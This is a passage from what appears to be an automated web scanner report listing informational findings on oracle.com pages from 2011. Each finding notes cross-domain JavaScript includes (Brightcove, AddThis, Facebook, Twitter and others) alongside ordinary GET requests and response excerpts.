Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41122111109101137,0:1)
Date: Tue, 06 Sep 2011 16:15:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.269. http://www.oracle.com/us/products/applications/primavera/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/applications/primavera/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/applications/primavera/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166877553917005,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 146321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.270. http://www.oracle.com/us/products/consulting/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/consulting/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/consulting/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41168123094454758,0:1)
Date: Tue, 06 Sep 2011 16:16:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.271. http://www.oracle.com/us/products/database/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/database/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/database/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=41104377188862589,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 155105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.272. http://www.oracle.com/us/products/enterprise-manager/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/enterprise-manager/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/enterprise-manager/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41182210587165352,0:1)
Date: Tue, 06 Sep 2011 16:16:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 147640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.273. http://www.oracle.com/us/products/financing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/financing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/financing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36010644761040741,0:1)
Date: Tue, 06 Sep 2011 16:16:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.274. http://www.oracle.com/us/products/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js
http://www.oracleimg.com/us/assets/mobilecompatibility.js

Request

GET /us/products/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=206;ecid=41100185301745926,0:1)
Date: Tue, 06 Sep 2011 16:16:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 143043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/mobilecompatibility.js" type="text/javascript">
</script>
<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript">
</script>
...[SNIP]...

20.275. http://www.oracle.com/us/products/middleware/exalogic/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/middleware/exalogic/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/middleware/exalogic/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41167156726795434,0:1)
Date: Tue, 06 Sep 2011 16:16:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 148017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.276. http://www.oracle.com/us/products/middleware/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/middleware/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/middleware/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=41182305076447159,0:1)
Date: Tue, 06 Sep 2011 16:16:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 159756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.277. http://www.oracle.com/us/products/ondemand/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/ondemand/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/ondemand/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41100704992796393,0:1)
Date: Tue, 06 Sep 2011 16:16:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 152580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.278. http://www.oracle.com/us/products/productslist/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/productslist/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ethnio.com/remotes/93611
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/productslist/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=11;ecid=41167500324184736,0:1)
Date: Tue, 06 Sep 2011 16:16:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 306727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</table>
<script language="javascript" src="http://ethnio.com/remotes/93611" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.279. http://www.oracle.com/us/products/servers-storage/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/servers-storage/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/servers-storage/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=8;ecid=35997313182343520,0:1)
Date: Tue, 06 Sep 2011 16:16:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 150851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.280. http://www.oracle.com/us/products/servers-storage/solaris/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/servers-storage/solaris/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/servers-storage/solaris/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=36009571019199159,0:1)
Date: Tue, 06 Sep 2011 16:16:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 146507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.281. http://www.oracle.com/us/products/tools/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/products/tools/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/products/tools/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41100606208547255,0:1)
Date: Tue, 06 Sep 2011 16:16:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 151414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.282. http://www.oracle.com/us/social-media/facebook/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/social-media/facebook/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://connect.facebook.net/en_US/all.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/social-media/facebook/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41101572576206911,0:1)
Date: Tue, 06 Sep 2011 16:16:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div class="faceBookLikeBt"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.283. http://www.oracle.com/us/social-media/linkedin/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/social-media/linkedin/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://connect.facebook.net/en_US/all.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/social-media/linkedin/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41168475281778550,0:1)
Date: Tue, 06 Sep 2011 16:16:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div class="faceBookLikeBt"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.284. http://www.oracle.com/us/social-media/twitter/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/social-media/twitter/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://connect.facebook.net/en_US/all.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://widgets.twimg.com/j/2/widget.js
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/social-media/twitter/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41168393677398942,0:1)
Date: Tue, 06 Sep 2011 16:16:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<div class="faceBookLikeBt"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</div--> <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.285. http://www.oracle.com/us/solutions/corporate-governance/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/corporate-governance/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/solutions/corporate-governance/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=208;ecid=41168861828840303,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 161084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.286. http://www.oracle.com/us/solutions/datawarehousing/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/datawarehousing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/solutions/datawarehousing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35744124860188436,0:1)
Date: Tue, 06 Sep 2011 16:16:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script src="http://s7.addthis.com/js/addthis_widget.php?v=12" type="text/javascript">
</script>
...[SNIP]...

<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_ocom.js"></script>
...[SNIP]...

20.287. http://www.oracle.com/us/solutions/ent-performance-bi/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.oracle.com
Path:	/us/solutions/ent-performance-bi/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://s7.addthis.com/js/addthis_widget.php?v=12
http://www.oracleimg.com/us/assets/metrics/ora_ocom.js

Request

GET /us/solutions/ent-performance-bi/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41120169783617619,0:1)
Date: Tue, 06 Sep 2011 16:16:30 GMT
Connection: close
Connection: Transfer-Encoding
